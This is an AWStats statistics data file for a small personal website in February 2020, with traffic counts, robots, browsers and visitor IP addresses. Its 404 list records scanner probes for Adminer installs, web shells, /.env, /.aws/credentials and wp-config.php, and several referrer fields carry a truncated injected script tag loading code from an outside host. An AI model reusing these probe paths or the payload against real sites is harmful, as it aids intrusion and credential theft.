AWSTATS DATA FILE 7.7 (build 20180105)
# If you remove this file, all statistics for date 202002 will be lost/reset.
# Last config file used to build this data file was /home/bailey/tmp/awstats/awstats.baileyhulsey.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2011                
POS_TIME 2675                
POS_VISITOR 19171               
POS_DAY 21447               
POS_DOMAIN 3292                
POS_LOGIN 3669                
POS_ROBOT 3824                
POS_WORMS 4227                
POS_EMAILSENDER 4358                
POS_EMAILRECEIVER 4501                
POS_SESSION 21749               
POS_SIDER 21896               
POS_FILETYPES 4636                
POS_DOWNLOADS 4751                
POS_OS 4945                
POS_BROWSER 5080                
POS_SCREENSIZE 5529                
POS_UNKNOWNREFERER 5603                
POS_UNKNOWNREFERERBROWSER 5853                
POS_ORIGIN 5995                
POS_SEREFERRALS 6127                
POS_PAGEREFS 6271                
POS_SEARCHWORDS 6419                
POS_KEYWORDS 6571                
POS_MISC 2339                
POS_ERRORS 6630                
POS_CLUSTER 3525                
POS_SIDER_404 6729                
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20200212021846 14 2897 9929812670086
FirstTime 0
LastTime 20200212002510
LastUpdate 20200212060952 14 0 14 0 0
TotalVisits 62                  
TotalUnique 58                  
MonthHostsKnown 0                   
MonthHostsUnknown 60                  
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
FlashSupport 0 0 0
QuickTimeSupport 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
RealPlayerSupport 0 0 0
DirectorSupport 0 0 0
JavascriptDisabled 0 0 0
TotalMisc 0 0 0
JavaEnabled 0 0 0
AddToFavourites 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 1 14 1926 10 11 2814
1 6 6 4690 316 318 7504
2 0 0 0 3 4 1876
3 3 3 2814 21 21 938
4 4 4 3752 53 70 9380
5 1 1 938 4 6 1876
6 1 1 938 6 13 2814
7 2 2 1876 5 12 1876
8 7 7 1460 11 11 2814
9 5 5 4690 10 13 2814
10 1 1 0 3 7 1876
11 7 7 5628 4 11 1876
12 8 8 7504 10 19 3752
13 6 6 5628 6 19 2814
14 2 2 1876 0 0 0
15 2 2 938 29 30 938
16 4 4 1876 4 6 938
17 2 2 1876 2 6 938
18 2 2 1876 2 2 0
19 1 1 938 3 6 1876
20 0 0 0 0 0 0
21 1 1 938 10 13 3752
22 2 2 1876 4 4 0
23 2 2 1876 8 14 1876
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 14
us 32 32 22096
cn 8 8 7504
gb 7 10 6797
fr 6 6 5628
ca 3 3 2814
ru 3 3 1876
zz 2 2 0
no 2 2 1876
de 2 12 2633
cz 1 1 938
in 1 1 938
it 1 1 938
pl 1 1 938
lv 1 1 938
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 7
Googlebot/ 16 15008 20200211133745 0
bot[\s_+:,\.\;\/\\-] 6 5628 20200212021846 0
YandexBot/ 4 3752 20200208121121 0
AhrefsBot/ 3 2814 20200211035203 0
bingbot/ 1 0 20200203044145 0
(firefox/)([0-9]\.|[0-1][0]\.) 1 938 20200206212102 0
no_user_agent 1 0 20200208004032 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 3
Unknown 6 522 0 0
html 64 54404 0 0
txt 13 988 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 2
/.well-known/pki-validation/3561253012B0B046F8341168F50A39F5.txt 12 0 924
/.well-known/pki-validation/0EBEF3CE8AFF0C201EAE2D614A56F21B.txt 1 0 64
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 6
win10 26 26
linux 21 21
winxp 2 2
win7 3 3
Unknown 30 17
macosx10 1 1
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 20
firefox59.0 1 1
msie8.0 1 1
chrome70.0.3538.77 1 1
firefox71.0 1 1
chrome76.0.3809.100 1 1
chrome34.0.1847.131 1 1
chrome51.0.2704.103 3 3
chrome49.0.2623.75 2 2
chrome22.0.1207.1 1 1
chrome76.0.3809.132 2 2
chrome79.0.3945.130 2 2
firefox54.0 1 1
firefox58.0 5 5
opera62.0.3331.99 3 3
chrome63.0.3239.132 8 8
chrome41.0.2228.0 1 1
Unknown 24 11
msie6.0 1 1
chrome66.0.3359.181 12 12
mozilla 12 12
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 3
Go-http-client/1.1 20200210052922
COMODO_DCV 20200206000026
Mozilla/5.0_(compatible;_Let's_Encrypt_validation_server;__https://www.letsencrypt.org) 20200209084308
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 2
COMODO_DCV 20200206000026
Go-http-client/1.1 20200210052922
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 70 83
From1 0 0
From2 0 0
From3 0 0
From4 0 0
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 0
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 0
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 2
404 549 0
206 29 27202
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 387
/adminer-4.5.0.php 1 -
/adminer-4.2.1-mysql-cs.php 1 -
/adminer-4.0.1-en.php 1 -
/adminer-4.2.4-mysql.php 1 -
/adminer-3.7.1-en.php 1 -
/pi.php 1 http://baileyhulsey.com/pi.php
/adminer-3.6.2-cs.php 1 -
/adminer-3.2.2-en.php 1 -
/adminer-3.6.0.php 1 -
/a.php 1 -
/adminer-3.4.0-mysql-cs.php 1 -
/styles.php 1 http://baileyhulsey.com/styles.php
/adminer-3.0.1-en.php 1 -
/adminer-4.2.3-mysql-cs.php 1 -
/adminer-4.2.4-mysql-en.php 1 -
/adminer-3.5.0-mysql-en.php 1 -
/adminer-3.5.0.php 1 -
/2019/wp-includes/wlwmanifest.xml 1 -
/cms/wp-includes/wlwmanifest.xml 1 -
/adminer-3.3.3-cs.php 1 -
/adminer-4.6.2-cs.php 1 -
/adminer-4.2.2-en.php 1 -
/adminer-4.6.0.php 1 -
/adminer-4.7.1-en.php 1 -
/adminer-3.6.3-en.php 1 -
/wp-includes/wlwmanifest.xml 1 -
/adminer-4.1.0-en.php 1 -
/adminer-4.2.4-mysql-cs.php 1 -
//REV/pi.php 1 http://baileyhulsey.com//REV/pi.php
/adminer-3.3.4-mysql.php 1 -
/wp-content/plugins/easy-wp-smtp/js/script.js 1 -
/adminer-3.6.0-mysql-en.php 1 -
/adminer-3.4.0-cs.php 1 -
/wp-content/plugins/strong-testimonials/templates/modern/content.css 5 -
/adminer-3.3.2-en.php 1 -
/adminer-3.1.0-en.php 1 -
/adminer-4.1.0-mysql-cs.php 1 -
/website/wp-includes/wlwmanifest.xml 1 -
/adminer-4.2.3-cs.php 1 -
/wp-content/adminer.php 1 -
/adminer-3.3.3-mysql-cs.php 1 -
/adminer-4.6.3-en.php 1 -
/adminer-3.1.0-mysql-en.php 1 -
/adminer-4.5.0-mysql-cs.php 1 -
/adminer-4.4.0-cs.php 1 -
/blog/wp-includes/wlwmanifest.xml 1 -
/adminer-3.6.1-mysql-cs.php 1 -
/options.php 1 http://baileyhulsey.com/options.php
/wp-json/wp/v2/users 1 -
/adminer-3.3.3-mysql.php 1 -
/w0rm.html.php 1 http://baileyhulsey.com/w0rm.html.php
/adminer-4.0.0-mysql-en.php 1 -
/wp-admin/admin-ajax.php 26 -
/adminer-3.6.4-en.php 1 -
/adminer-4.6.2-mysql.php 1 -
/replace.php 1 -
/wp-json/wpshopify/v1/settings 1 -
/adminer-3.1.0-mysql-cs.php 1 -
/adminer-4.7.3.php 1 -
/wp-content/plugins/visualizer/js/media.js 1 -
/adminer-3.6.2-mysql.php 1 -
/adminer-4.2.4-cs.php 1 -
/adminer-4.0.3.php 1 -
/wp-content/uploads/file-manager/log.txt 1 -
/pas.php 1 http://baileyhulsey.com/pas.php
/adminer-3.2.1-mysql-en.php 1 -
/adminer-4.0.1-mysql-en.php 1 -
//2019/wp-login.php 1 -
/foo/wp-login.php 1 -
/adminer-4.4.0-mysql.php 1 -
/adminer-4.7.1-mysql-cs.php 1 -
/adminer-4.7.0-en.php 1 -
/adminer-4.6.1.php 1 -
/adminer-3.6.3-mysql-cs.php 1 -
/adminer 1 -
/wp-json/visualizer/v1/update-chart 2 -
/adminer-3.3.2-mysql-en.php 1 -
/adminer-3.7.1-mysql-en.php 1 -
/adminer-3.5.1.php 1 -
/wp-admin/wp-login.php 3 \"><script%20type=text/javascript%20src='https://slow.destinyfernandi.com/hos
/adminer-3.7.1-mysql-cs.php 1 -
/wp-json/wp/v2/posts 2 -
/adminer-4.2.3-mysql.php 1 -
/adminer-3.0.0-en.php 1 -
/author-sitemap.xml 1 -
/root.php 1 http://baileyhulsey.com/root.php
/adminer-4.4.0-mysql-cs.php 1 -
/adminer-3.6.1.php 1 -
/adminer-3.7.0-en.php 1 -
/adminer-3.4.0-mysql.php 1 -
/adminer-4.0.0-en.php 1 -
/sitemap.xml 1 -
/db.php 1 -
/seter.php 1 http://baileyhulsey.com/seter.php
/adminer-3.0.0-mysql-en.php 1 -
/adminer-3.3.4-cs.php 1 -
/css.php 1 http://baileyhulsey.com/css.php
/adminer-4.3.0-mysql-cs.php 1 -
/adminer-4.3.0-en.php 1 -
/blog/wp-login.php 1 -
/adminer-3.4.0-mysql-en.php 1 -
/adminer-3.4.0.php 1 -
/adminer-3.6.1-mysql.php 1 -
//wp-login.php 1 \"><script%20type=text/javascript%20src='https://slow.destinyfernandi.com/hos
/adminer-4.2.3.php 1 -
/adminer-3.3.4-mysql-en.php 1 -
/adminer-4.5.0-mysql-en.php 1 -
/adminer-3.3.0-en.php 1 -
/adminer-3.5.1-mysql.php 1 -
/wp-json/siteground-optimizer/v1/enable-option 1 -
/wp-acess.php 1 http://baileyhulsey.com/wp-acess.php
/adminer-4.6.1-mysql.php 1 -
/adminer-4.4.0.php 1 -
/wp2/wp-includes/wlwmanifest.xml 1 -
/wp-content/plugins/fv-wordpress-flowplayer/css/flowplayer.css 1 -
/wp-content/plugins/accessally/resource/backend/css/accessally-manage.css 6 -
/adminer-3.6.4-mysql-cs.php 1 -
/installer.php 1 -
/adminer-4.5.0-cs.php 1 -
/adminer-3.3.1-mysql-cs.php 1 -
/adminer-4.7.1-mysql-en.php 1 -
//test/wp-login.php 1 -
/adminer-3.6.2.php 1 -
/adminer-3.6.0-cs.php 1 -
/adminer-3.2.0-en.php 1 -
/adminer-4.0.3-mysql.php 1 -
//wp2/wp-login.php 1 -
/adminer-3.5.0-cs.php 1 -
/ClientPage.php 1 http://baileyhulsey.com/ClientPage.php
/adminer-4.7.3-mysql.php 1 -
//wp/wp-login.php 1 -
/wp-content/plugins/wp-inventory-manager/themes/css/default-theme.css 1 -
/adminer-4.6.2.php 1 -
/adminer-4.2.0-en.php 1 -
/adminer-4.6.0-cs.php 1 -
/adminer-4.0.2-mysql-cs.php 1 -
/adminer-3.2.0-mysql-cs.php 1 -
/adminer-3.3.3.php 1 -
/adminer-4.6.1-cs.php 1 -
/adminer-3.6.2-mysql-en.php 1 -
/adminer-4.2.1-en.php 1 -
/adminer-4.7.2-en.php 1 -
/adm.php 1 -
/ 2 \"><script%20type=text/javascript%20src='https://slow.destinyfernandi.com/hos
/adminer-3.5.1-cs.php 1 -
/adminer-3.6.1-cs.php 1 -
/adminer-3.2.1-en.php 1 -
/wp-content/plugins/linklove/linklove.php 1 baileyhulsey.com
/pma.php 1 -
/adminer-3.3.1-mysql-en.php 1 -
/adminer-3.3.4.php 1 -
/adminer-4.6.2-mysql-en.php 1 -
/adminer-4.2.0-mysql-cs.php 1 -
/adminer-4.0.2-en.php 1 -
/wp-content/plugins/easy2map/scripts/jquery.xml2json.js 1 -
/adminer-4.6.0-mysql.php 1 -
/wp-content/plugins/simple-fields/js/chosen/chosen.css 1 -
/adminer-4.7.0-mysql-en.php 1 -
//old/wp-login.php 1 -
/adminer-4.6.1-mysql-cs.php 1 -
/adminer-3.5.0-mysql.php 1 -
/adminer-3.3.1-en.php 1 -
/wp-admin/setup-config.php 1 -
/adminer-4.7.3-cs.php 1 -
/adminer-4.2.4.php 1 -
/adminer-4.0.3-cs.php 1 -
/adminer-3.6.0-mysql.php 1 -
/f0w.php 1 http://baileyhulsey.com/f0w.php
/2.php 1 http://baileyhulsey.com/2.php
/adminer-4.2.5-en.php 1 -
/wp-content/plugins/hybrid-composer/style.css 1 -
/adminer-3.6.4-mysql-en.php 1 -
/adminer-4.3.1-en.php 1 -
/adminer-4.7.2-mysql-en.php 1 -
/wp1/wp-includes/wlwmanifest.xml 1 -
/adminer-4.5.0-mysql.php 1 -
/adminer-4.2.0-mysql-en.php 1 -
/adminer-4.1.0.php 1 -
/adminer-4.3.0-cs.php 1 -
/adminer-4.0.2-mysql.php 1 -
/adminer-3.6.3.php 1 -
/wp-content/plugins/convertplug/modules/info_bar/assets/css/info_bar.min.css 1 -
/adminer-3.3.0-mysql-en.php 1 -
/dup-installer/main.installer.php 1 -
/adminer-3.2.1-mysql.php 1 -
/media/wp-includes/wlwmanifest.xml 1 -
/adminer-4.7.3-mysql-cs.php 1 -
/adminer-4.6.3.php 1 -
/adminer-3.3.0-cs.php 1 -
/adminer-4.3.0-mysql-en.php 1 -
/adminer-3.3.2.php 1 -
/wp.php 1 -
/adminer-3.1.0.php 1 -
/mikoshell-about.php 1 http://baileyhulsey.com/mikoshell-about.php
/wp-content/plugins/batchmove/js/batch.js 5 -
/wp-content/plugins/delucks-seo/modules/professional/breadcrumbs/assets/css/frontend.css 2 -
/adminer-3.0.1-mysql-cs.php 1 -
/adminer-4.7.2-mysql.php 1 -
/adminer-4.2.1-mysql.php 1 -
/adminer-4.0.1.php 1 -
/adminer-4.5.0-en.php 1 -
/adminer-4.3.1-mysql.php 1 -
/feed 1 -
/wordpress/wp-includes/wlwmanifest.xml 1 -
/_adminer 1 -
/adminer-4.2.5-mysql.php 1 -
/adminer-3.6.0-en.php 1 -
/adminer-3.2.0-cs.php 1 -
/adminer-3.2.2.php 1 -
/wp-json/ 1 -
/adminer-3.7.1.php 1 -
/adminer-3.3.1-mysql.php 1 -
/adminer-3.5.0-en.php 1 -
/adminer-3.0.1.php 1 -
/adminer-3.7.0-mysql-en.php 1 -
/adminer-4.7.1.php 1 -
/sito/wp-includes/wlwmanifest.xml 1 -
/adminer-4.6.0-en.php 1 -
/adminer-4.2.0-cs.php 1 -
/adminer-4.2.2.php 1 -
/adminer-3.2.2-mysql-en.php 1 -
/adminer-4.0.1-mysql-cs.php 1 -
/2018/wp-includes/wlwmanifest.xml 1 -
/ad.php 1 -
/gaza.php 1 http://baileyhulsey.com/gaza.php
/bla.php 1 http://baileyhulsey.com/bla.php
/web/wp-includes/wlwmanifest.xml 1 -
/adminer-4.2.1-cs.php 1 -
/adminer-4.6.1-en.php 1 -
/adminer-4.7.0.php 1 -
/adminer-4.7.2-cs.php 1 -
/adminer-4.2.1-mysql-en.php 1 -
/adminer-3.0.0.php 1 -
/wp-config.php 1 -
//REV/50btc.php 1 http://baileyhulsey.com//REV/50btc.php
/adminer-3.5.1-en.php 1 -
/adminer-4.6.0-mysql-cs.php 1 -
/adminer-3.3.0-mysql.php 1 -
/adminer-3.7.0.php 1 -
/adminer-3.6.1-en.php 1 -
/adminer-3.2.1-cs.php 1 -
/adminer-3.5.1-mysql-cs.php 1 -
/adminer-4.6.3-mysql-cs.php 1 -
/adminer-3.5.1-mysql-en.php 1 -
/adminer-4.3.0-mysql.php 1 -
/adminer-4.6.2-mysql-cs.php 1 -
/connect.php 1 -
/adminer-4.0.2-cs.php 1 -
/adminer-4.0.0.php 1 -
/adminer-4.6.1-mysql-en.php 1 -
/wp-admin/admin-post.php 22 -
/adminer-4.2.0-mysql.php 1 -
/adminer-3.6.4.php 1 -
/adminer-4.0.0-mysql-cs.php 1 -
//wp1/wp-login.php 1 -
/bladeacss.php 1 http://baileyhulsey.com/bladeacss.php
/t4.php 1 http://baileyhulsey.com/t4.php
/adminer-3.3.1-cs.php 1 -
/iglp.php 1 http://baileyhulsey.com/iglp.php
/wp-login.php 7 -
/adminer-3.3.3-mysql-en.php 1 -
/adminer-4.7.3-en.php 1 -
/adminer.php 1 -
/adminer-4.0.3-en.php 1 -
/blog/wp-json/ 1 -
/adminer-3.2.0-mysql.php 1 -
/adminer-4.2.5-cs.php 1 -
//2020/wp-login.php 1 -
/mysql.php 1 -
/adminer-3.5.0-mysql-cs.php 1 -
/wp-content/themes/wp-update.php 1 baileyhulsey.com
/adminer-4.2.2-mysql-en.php 1 -
/50btc.php 1 http://baileyhulsey.com/50btc.php
/adminer-4.1.0-mysql-en.php 1 -
/wp-content/plugins/adminer/inc/editor/index.php 1 -
/adminer-4.3.1-cs.php 1 -
/ws.php 1 http://baileyhulsey.com/ws.php
/installer-backup.php 1 -
/1.php 1 http://baileyhulsey.com/1.php
//REV/people.php 1 http://baileyhulsey.com//REV/people.php
/adminer-4.0.1-cs.php 1 -
/adminer-4.0.3-mysql-en.php 1 -
/adminer-3.7.1-cs.php 1 -
/adminer-3.2.0.php 1 -
/adminer-3.2.2-cs.php 1 -
/adminer-3.6.2-en.php 1 -
/wp-content/uploads/adminer.php 1 -
//shell.php 1 -
/adminer-3.6.0-mysql-cs.php 1 -
/adminer-3.0.1-cs.php 1 -
/adminer-4.0.2-mysql-en.php 1 -
/adminer-3.6.2-mysql-cs.php 1 -
/adminer-3.2.0-mysql-en.php 1 -
/searchreplacedb2.php 1 -
/adminer-3.3.4-mysql-cs.php 1 -
/.env 7 -
/adminer-3.3.3-en.php 1 -
/.aws/credentials 5 -
/site/wp-includes/wlwmanifest.xml 1 -
/adminer-4.2.0.php 1 -
/wp-content/plugins/wp-central/readme.txt 6 -
/adminer-4.6.2-en.php 1 -
/adminer-4.2.2-cs.php 1 -
/adminer-3.6.4-mysql.php 1 -
/adminer-4.7.1-cs.php 1 -
/wp-content/plugins/wpematico/app/js/wpe_hooks.js 1 -
/adminer-4.2.5-mysql-cs.php 1 -
/wordpress/wp-login.php 1 -
/adminer-3.2.2-mysql-cs.php 1 -
/adminer-3.6.3-cs.php 1 -
/adminer-4.0.0-mysql.php 1 -
/adminer-4.1.0-cs.php 1 -
/adminer-4.7.3-mysql-en.php 1 -
/adminer-4.3.0.php 1 -
/adminer-3.4.0-en.php 1 -
/adminer-4.0.3-mysql-cs.php 1 -
/adminer-3.7.0-mysql.php 1 -
/adminer-3.2.1-mysql-cs.php 1 -
/adminer-3.3.0.php 1 -
/adminer-4.3.1-mysql-cs.php 1 -
/adminer-3.3.2-cs.php 1 -
/wp-content/plugins/blnmrpb/log.txt 6 -
/wp-content/plugins/wordpress-database-reset/assets/css/bsmselect.css 6 -
/adminer-3.1.0-cs.php 1 -
/wp-admin 2 \"><script%20type=text/javascript%20src='https://slow.destinyfernandi.com/hos
/adminer-3.0.0-mysql.php 1 -
/adminer-3.6.3-mysql-en.php 1 -
/adminer-4.6.3-cs.php 1 -
/adminer-4.2.3-en.php 1 -
/adminer-4.3.1-mysql-en.php 1 -
/admin/ckfinder/ckfinder.html 1 -
/adminer-4.7.0-mysql.php 1 -
/adminer-4.6.3-mysql-en.php 1 -
/wp-json/wp/v2/users/ 8 -
/adminer-4.4.0-en.php 1 -
/wp-back.php 1 http://baileyhulsey.com/wp-back.php
/adminer-4.2.2-mysql-cs.php 1 -
/ads.txt 4 -
/adminer-3.6.1-mysql-en.php 1 -
/robots.txt 20 -
/wpdemos.php 6 -
/adminer-4.7.1-mysql.php 1 -
/adminer-3.6.4-cs.php 1 -
/adminer-4.7.0-mysql-cs.php 1 -
/adminer-4.2.2-mysql.php 1 -
//REV/no.php 1 http://baileyhulsey.com//REV/no.php
/adminer-3.0.1-mysql.php 1 -
/adminer-4.2.3-mysql-en.php 1 -
/adminer-3.3.1.php 1 -
/adminer-3.2.2-mysql.php 1 -
/adminer-3.7.1-mysql.php 1 -
/adminer-4.2.4-en.php 1 -
/adminer-4.2.5.php 1 -
/adminer-3.3.2-mysql-cs.php 1 -
/.index.php 1 http://baileyhulsey.com/.index.php
/adminer-4.3.1.php 1 -
/test/wp-includes/wlwmanifest.xml 1 -
/adminer-4.0.1-mysql.php 1 -
/wp/wp-includes/wlwmanifest.xml 1 -
/adminer-4.7.0-cs.php 1 -
/adminer-4.7.2.php 1 -
/adminer-4.2.1.php 1 -
/_adminer.php 1 -
/adminer-3.0.0-mysql-cs.php 1 -
/main.css 16 http://www.baileyhulsey.com/
/adminer-4.4.0-mysql-en.php 1 -
/adminer-3.1.0-mysql.php 1 -
/adminer-3.3.2-mysql.php 1 -
/shop/wp-includes/wlwmanifest.xml 1 -
/adminer-4.6.3-mysql.php 1 -
/adminer-3.0.1-mysql-en.php 1 -
/adminer-3.0.0-cs.php 1 -
/xmlrpc.php 17 -
/adminer-4.2.5-mysql-en.php 1 -
/adminer-3.2.1.php 1 -
/adminer-3.7.0-cs.php 1 -
/adminer-3.7.0-mysql-cs.php 1 -
/adminer-3.3.0-mysql-cs.php 1 -
/adminer-4.0.2.php 1 -
/adminer-4.0.0-cs.php 1 -
/adminer-3.6.3-mysql.php 1 -
/wp-config.php~ 1 -
/adminer-4.7.2-mysql-cs.php 1 -
/news/wp-includes/wlwmanifest.xml 1 -
/adminer-3.3.4-en.php 1 -
/adminer-4.6.0-mysql-en.php 1 -
/adminer-4.1.0-mysql.php 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 60
51.68.152.26 3 3 2814 20200209124316
185.101.35.48 2 2 1876 20200202011506
66.133.109.36 2 2 174 20200209084308
52.15.254.228 2 2 174 20200209084307
195.154.62.232 2 2 1876 20200210140405
104.196.198.200 2 2 938 20200205162445
158.69.241.223 2 2 1876 20200209093459
35.237.43.9 2 2 938 20200209165343
104.196.216.71 2 2 938 20200201154933
192.150.244.80 2 2 0 20200207103641
51.38.140.4 2 2 1876 20200203031650
144.168.162.250 1 1 938 20200206134128
34.219.226.6 1 1 938 20200209111405
54.149.76.201 1 1 938 20200205132038
34.214.205.4 1 1 938 20200210115012
34.219.132.203 1 1 938 20200210052922
167.114.208.121 1 1 938 20200202064638
123.148.208.221 1 1 938 20200207235341
34.213.236.123 1 1 938 20200208123244
93.185.103.30 1 1 938 20200202121033
34.215.210.60 1 1 938 20200201115135
123.148.145.57 1 1 938 20200212002510
185.217.170.69 1 1 938 20200202131449
62.210.10.77 1 1 938 20200210133053
52.36.186.175 1 1 938 20200207112152
31.220.51.179 0 10 757 
51.158.191.84 1 1 938 20200209071728
123.148.145.112 1 1 938 20200203210625
54.184.229.110 1 1 938 20200204124558
66.102.7.236 1 1 938 20200201111024
66.102.7.232 1 1 938 20200202120641
213.192.75.52 1 1 938 20200203042302
34.223.6.154 1 1 938 20200203112514
54.200.84.9 1 1 938 20200206124224
34.222.229.130 1 1 87 20200209084308
51.255.162.143 1 1 938 20200202230009
64.246.165.150 1 1 938 20200205042035
78.47.228.112 1 1 938 20200208142642
92.53.78.136 1 1 938 20200206094307
195.154.63.222 1 1 938 20200207185425
27.48.241.1 1 1 938 20200204034209
34.219.47.71 1 1 938 20200207011025
185.195.24.60 1 1 0 20200205011812
125.105.100.92 1 1 938 20200201090214
188.92.72.129 1 1 938 20200206042615
62.210.5.253 1 1 938 20200207184917
18.144.126.1 1 1 938 20200204222124
68.183.76.157 1 1 938 20200203074751
125.106.94.7 1 1 938 20200204223612
151.80.149.131 1 1 938 20200209085928
91.199.212.132 0 3 231 
34.221.36.101 1 1 938 20200211124930
62.138.137.114 1 1 938 20200210043912
163.172.121.68 1 1 938 20200202173629
52.28.236.88 1 1 87 20200209084308
125.105.82.44 1 1 938 20200211090321
34.209.26.156 1 1 938 20200202135927
54.213.195.201 1 1 938 20200209192025
123.148.144.104 1 1 938 20200207125507
123.148.240.86 1 1 938 20200203011922
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 12
20200201 5 5 3752 4
20200202 10 10 9380 9
20200203 8 8 6566 7
20200204 4 4 3752 4
20200205 5 5 2814 4
20200206 5 18 5678 5
20200207 8 8 6566 8
20200208 2 2 1876 2
20200209 15 15 8026 11
20200210 5 5 4690 5
20200211 2 2 1876 2
20200212 1 1 938 1
END_DAY

# Session range - Number of visits
BEGIN_SESSION 1
0s-30s 62
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 3
/ 64 54404 58 58
/.well-known/acme-challenge/2w7pNRjaKa4wN8dbk4JHYkJz8rAQuuHVNisOCty8WlQ 4 348 4 2
/.well-known/acme-challenge/CXN3nGImnBPFQDK5BvSHpyOU_p-LfKqBw7EQNF-mYJM 2 174 0 2
END_SIDER
